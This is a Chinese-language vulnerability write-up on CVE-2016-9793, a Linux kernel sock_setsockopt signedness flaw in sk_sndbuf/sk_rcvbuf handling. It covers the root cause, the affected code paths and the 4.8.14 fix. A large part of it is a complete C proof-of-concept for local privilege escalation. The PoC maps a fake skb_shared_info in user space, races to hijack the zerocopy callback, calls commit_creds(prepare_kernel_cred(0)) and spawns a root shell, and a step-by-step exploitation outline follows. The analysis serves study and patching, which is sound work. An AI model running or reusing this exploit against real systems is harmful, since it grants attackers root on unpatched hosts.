漏洞分析
Linux kernel 4.8.13及之前的版本中的net/core/sock.c
文件的sock_setsockopt
函数存在安全漏洞,该漏洞源于程序没有正确的处理sk_sndbuf
和sk_rcvbuf
的负值。本地攻击者可利用该漏洞造成拒绝服务(内存损坏和系统崩溃)。
影响版本
Linux kernel 3.11 -> 4.8
源码分析(以4.8.13为例)
下载地址
sock_setsockopt中关于sk_sndbuf
和sk_rcvbuf
的处理:
set_sndbuf:
case SO_SNDBUF:
/* Don't error on this BSD doesn't and if you think
* about it this is right. Otherwise apps have to
* play 'guess the biggest size' games. RCVBUF/SNDBUF
* are treated in BSD as hints
*/
val = min_t(u32, val, sysctl_wmem_max);
sk->sk_userlocks |= SOCK_SNDBUF_LOCK;
sk->sk_sndbuf = max_t(u32, val * 2, SOCK_MIN_SNDBUF);
/* Wake up sending tasks if we upped the value. */
sk->sk_write_space(sk);
break;
set_rcvbuf:
case SO_RCVBUF:
/* Don't error on this BSD doesn't and if you think
* about it this is right. Otherwise apps have to
* play 'guess the biggest size' games. RCVBUF/SNDBUF
* are treated in BSD as hints
*/
val = min_t(u32, val, sysctl_rmem_max);
sk->sk_userlocks |= SOCK_RCVBUF_LOCK;
/*
* We double it on the way in to account for
* "struct sk_buff" etc. overhead. Applications
* assume that the SO_RCVBUF setting they make will
* allow that much actual data to be received on that
* socket.
*
* Applications are unaware that "struct sk_buff" and
* other overheads allocate from the receive buffer
* during socket buffer allocation.
*
* And after considering the possible alternatives,
* returning the value we actually used in getsockopt
* is the most desirable behavior.
*/
sk->sk_rcvbuf = max_t(u32, val * 2, SOCK_MIN_RCVBUF);
break;
max_t定义如下:
#define max_t(type, x, y) ({
type __max1 = (x);
type __max2 = (y);
__max1 > __max2 ? __max1: __max2; })
以set_sndbuf为例,max_t(u32, val * 2, SOCK_MIN_SNDBUF)
即以u32
类型(无符号整数)比较val * 2
和SOCK_MIN_SNDBUF
的大小,因此会出现-1>100这样的情况,从而导致被攻击。
POC
PS:需要自行修改偏移。并且条件竞争存在一定概率,需多运行几遍才可提权
#define _GNU_SOURCE
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <pthread.h>
#include <signal.h>
#include <stdarg.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define COMMIT_CREDS 0xffffffff810a4b80
#define PREPARE_KERNEL_CRED 0xffffffff810a4f30
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;
void get_root(void) {
commit_creds(prepare_kernel_cred(0));
}
struct ubuf_info_t {
uint64_t callback; // void (*callback)(struct ubuf_info *, bool)
uint64_t ctx; // void *
uint64_t desc; // unsigned long
};
struct skb_shared_info_t {
uint8_t nr_frags; // unsigned char
uint8_t tx_flags; // __u8
uint16_t gso_size; // unsigned short
uint16_t gso_segs; // unsigned short
uint16_t gso_type; // unsigned short
uint64_t frag_list; // struct sk_buff *
uint64_t hwtstamps; // struct skb_shared_hwtstamps
uint32_t tskey; // u32
uint32_t ip6_frag_id; // __be32
uint32_t dataref; // atomic_t
uint64_t destructor_arg; // void *
uint8_t frags[16][17]; // skb_frag_t frags[MAX_SKB_FRAGS];
};
// sk_sndbuf = 0xffffff00 => skb_shinfo(skb) = 0x00000000fffffed0
#define SNDBUF 0xffffff00
#define SHINFO 0x00000000fffffed0
struct ubuf_info_t ubuf_info = {(uint64_t)&get_root, 0, 0};
//struct ubuf_info_t ubuf_info = {0xffffdeaddeadbeeful, 0, 0};
struct skb_shared_info_t *skb_shared_info = (struct skb_shared_info_t *)SHINFO;
#define SKBTX_DEV_ZEROCOPY (1 << 3)
void* skb_thr(void* arg) {
while (1) {
skb_shared_info->destructor_arg = (uint64_t)&ubuf_info;
skb_shared_info->tx_flags |= SKBTX_DEV_ZEROCOPY;
}
}
int sockets[2];
void *write_thr(void *arg) {
// Write blocks until setsockopt(SO_SNDBUF).
write(sockets[1], "x5c", 1);
if (getuid() == 0) {
printf("[+] got r00tn");
execl("/bin/sh", "sh", NULL);
perror("execl()");
}
printf("[-] something went wrongn");
}
int main() {
void *addr;
int rv;
uint32_t sndbuf;
addr = mmap((void *)(SHINFO & 0xfffffffffffff000ul), 0x1000,
PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE,
-1, 0);
if (addr != (void *)(SHINFO & 0xfffffffffffff000ul)) {
perror("mmap()");
exit(EXIT_FAILURE);
}
printf("[.] userspace payload mmapped at %pn", addr);
pthread_t skb_th;
rv = pthread_create(&skb_th, 0, skb_thr, NULL);
if (rv != 0) {
perror("pthread_create()");
exit(EXIT_FAILURE);
}
usleep(10000);
printf("[.] overwriting thread startedn");
rv = socketpair(AF_LOCAL, SOCK_STREAM, 0, &sockets[0]);
if (rv != 0) {
perror("socketpair()");
exit(EXIT_FAILURE);
}
printf("[.] sockets openedn");
sndbuf = SNDBUF;
rv = setsockopt(sockets[1], SOL_SOCKET, SO_SNDBUFFORCE,
&sndbuf, sizeof(sndbuf));
if (rv != 0) {
perror("setsockopt()");
exit(EXIT_FAILURE);
}
printf("[.] sock->sk_sndbuf set to 0x%xn", SNDBUF * 2);
pthread_t write_th;
rv = pthread_create(&write_th, 0, write_thr, NULL);
if (rv != 0) {
perror("pthread_create()");
exit(EXIT_FAILURE);
}
usleep(10000);
printf("[.] writing to socketn");
// Wake up blocked write.
rv = setsockopt(sockets[1], SOL_SOCKET, SO_SNDBUF,
&sndbuf, sizeof(sndbuf));
if (rv != 0) {
perror("setsockopt()");
exit(EXIT_FAILURE);
}
usleep(10000);
close(sockets[0]);
close(sockets[1]);
void *status;
pthread_join(write_th, &status);
return 0;
}
提权分析
通过test程序报错的调用链分析:
while (sent < len) {
size = len - sent;
/* Keep two messages in the pipe so it schedules better */
size = min_t(int, size, (sk->sk_sndbuf >> 1) - 64);
/* allow fallback to order-0 allocations */
size = min_t(int, size, SKB_MAX_HEAD(0) + UNIX_SKB_FRAGS_SZ);
data_len = max_t(int, 0, size - SKB_MAX_HEAD(0));
data_len = min_t(size_t, size, PAGE_ALIGN(data_len));
skb = sock_alloc_send_pskb(sk, size - data_len, data_len,
msg->msg_flags & MSG_DONTWAIT, &err,
get_order(UNIX_SKB_FRAGS_SZ));
该代码主要将sk_sndbuf与其他值进行一系列比较,最终赋值给data_len,并且调用sock_alloc_send_pskb()函数。
而data_len最终作为__alloc_skb()函数的size参数:
struct sk_buff *__alloc_skb(unsigned int size, gfp_t gfp_mask,
int flags, int node)
{
struct kmem_cache *cache;
struct skb_shared_info *shinfo;
struct sk_buff *skb;
u8 *data;
bool pfmemalloc;
cache = (flags & SKB_ALLOC_FCLONE)
? skbuff_fclone_cache : skbuff_head_cache;
if (sk_memalloc_socks() && (flags & SKB_ALLOC_RX))
gfp_mask |= __GFP_MEMALLOC;
/* Get the HEAD */
skb = kmem_cache_alloc_node(cache, gfp_mask & ~__GFP_DMA, node);
if (!skb)
goto out;
prefetchw(skb);
/* We do our best to align skb_shared_info on a separate cache
* line. It usually works because kmalloc(X > SMP_CACHE_BYTES) gives
* aligned memory blocks, unless SLUB/SLAB debug is enabled.
* Both skb->head and skb_shared_info are cache line aligned.
*/
size = SKB_DATA_ALIGN(size);
size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
data = kmalloc_reserve(size, gfp_mask, node, &pfmemalloc);
if (!data)
goto nodata;
/* kmalloc(size) might give us more room than requested.
* Put skb_shared_info exactly at the end of allocated zone,
* to allow max possible filling before reallocation.
*/
size = SKB_WITH_OVERHEAD(ksize(data));
prefetchw(data + size);
/*
* Only clear those fields we need to clear, not those that we will
* actually initialise below. Hence, don't put any more fields after
* the tail pointer in struct sk_buff!
*/
memset(skb, 0, offsetof(struct sk_buff, tail));
/* Account for allocated memory : skb + skb->head */
skb->truesize = SKB_TRUESIZE(size);
skb->pfmemalloc = pfmemalloc;
atomic_set(&skb->users, 1);
skb->head = data;
skb->data = data;
skb_reset_tail_pointer(skb);
/*
static inline void skb_reset_tail_pointer(struct sk_buff *skb)
{
skb->tail = skb->data;
}
*/
skb->end = skb->tail + size;
skb->mac_header = (typeof(skb->mac_header))~0U;
skb->transport_header = (typeof(skb->transport_header))~0U;
/* make sure we initialize shinfo sequentially */
shinfo = skb_shinfo(skb);
memset(shinfo, 0, offsetof(struct skb_shared_info, dataref));
atomic_set(&shinfo->dataref, 1);
kmemcheck_annotate_variable(shinfo->destructor_arg);
if (flags & SKB_ALLOC_FCLONE) {
struct sk_buff_fclones *fclones;
fclones = container_of(skb, struct sk_buff_fclones, skb1);
kmemcheck_annotate_bitfield(&fclones->skb2, flags1);
skb->fclone = SKB_FCLONE_ORIG;
atomic_set(&fclones->fclone_ref, 1);
fclones->skb2.fclone = SKB_FCLONE_CLONE;
fclones->skb2.pfmemalloc = pfmemalloc;
}
out:
return skb;
nodata:
kmem_cache_free(cache, skb);
skb = NULL;
goto out;
}
该函数主要申请一个sk_buff
结构,并且对head
,end
,tail
等成员赋值。主要注意的是对size
进行对齐,并加上skb->tail
赋值给skb->end
。
而当执行close(sockets[0]);
时会调用skb_release_data()
。其代码如下:
static void skb_release_data(struct sk_buff *skb)
{
struct skb_shared_info *shinfo = skb_shinfo(skb);
int i;
if (skb->cloned &&
atomic_sub_return(skb->nohdr ? (1 << SKB_DATAREF_SHIFT) + 1 : 1,
&shinfo->dataref))
return;
for (i = 0; i < shinfo->nr_frags; i++)
__skb_frag_unref(&shinfo->frags[i]);
/*
* If skb buf is from userspace, we need to notify the caller
* the lower device DMA has done;
*/
if (shinfo->tx_flags & SKBTX_DEV_ZEROCOPY) {
struct ubuf_info *uarg;
uarg = shinfo->destructor_arg;
if (uarg->callback)
uarg->callback(uarg, true);
}
if (shinfo->frag_list)
kfree_skb_list(shinfo->frag_list);
skb_free_head(skb);
}
其中,当执行skb_shinfo(skb)
时,返回值为skb->end
+skb->head
。接着通过获取到的shinfo读取destructor_arg结构,从而调用callback指针函数。
POC思路
-
申请0xfffff000~0x100000000,方便后续利用 -
创建新线程,重复对0xfffffed0处对应的 shinfo
结构赋值,从而劫持callback指针。 -
新建两个套接字,用以发送和接收信息。 -
通过 setsockopt(sockets[1], SOL_SOCKET, SO_SNDBUFFORCE,&sndbuf, sizeof(sndbuf));
将sk_sndbuf
设置为0xfffffe00。 -
新建线程,调用 sock
的write
调用,从而实现将skb->end
设置为0xfffffec0,skb->head
设置为0x10,即shinfo=0xfffffed0
。 -
最后通过 close(sockets[0]);
调用callback指针所指的函数,实现提权。
环境与复现
https://github.com/nuoye-blog/cve/tree/master/cve-2016-9793
漏洞修补
可以在Linux kernel 4.8.14版本中看到max_t(u32, val * 2, SOCK_MIN_SNDBUF);
和max_t(u32, val * 2, SOCK_MIN_RCVBUF);
被修改为了max_t(int, val * 2, SOCK_MIN_SNDBUF);
以及max_t(int, val * 2, SOCK_MIN_RCVBUF);
。
参考链接
CVE-2016-9793 Linux kernel 安全漏洞-漏洞情报、漏洞详情、安全漏洞、CVE - 安全客,安全资讯平台 https://www.anquanke.com/vul/id/1123808
本文始发于微信公众号(星盟安全):CVE-2016-9793漏洞分析与利用
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论